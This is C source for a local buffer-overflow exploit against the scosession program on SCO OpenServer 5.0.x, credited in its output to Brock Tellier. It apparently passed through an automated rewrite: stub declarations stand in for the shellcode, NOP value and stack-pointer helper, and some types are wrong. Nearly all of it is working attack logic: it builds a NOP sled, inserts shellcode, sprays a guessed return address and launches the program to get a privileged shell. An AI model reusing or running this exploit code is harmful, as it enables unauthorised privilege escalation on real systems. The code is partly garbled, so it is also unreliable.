
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int LEN ;
 int NOP ;
 void* atoi (char*) ;
 int execl (char*,char*,char*,char*,int *) ;
 int exit (int ) ;
 int fprintf (int ,char*,...) ;
 long get_sp () ;
 int memcpy (char*,int ,int) ;
 int memset (char*,int ,int) ;
 int scoshell ;
 int stderr ;
 int strlen (int ) ;

int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];

if(argc > 3) {
 fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
}
else if (argc == 3) {
 offset=atoi(argv[1]);
        buflen=atoi(argv[2]);
}
 else {
   offset=9000;
   buflen=2000;


 }


addr=get_sp();

fprintf(stderr, "scosession local exploit for SCO OpenServer 5.0.x\n");
fprintf(stderr, "By Brock Tellier btellier@webley.com\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr-offset);


memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+4;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;

execl("/usr/bin/X11/scosession", "scosession", "-bg", buf, ((void*)0));

}
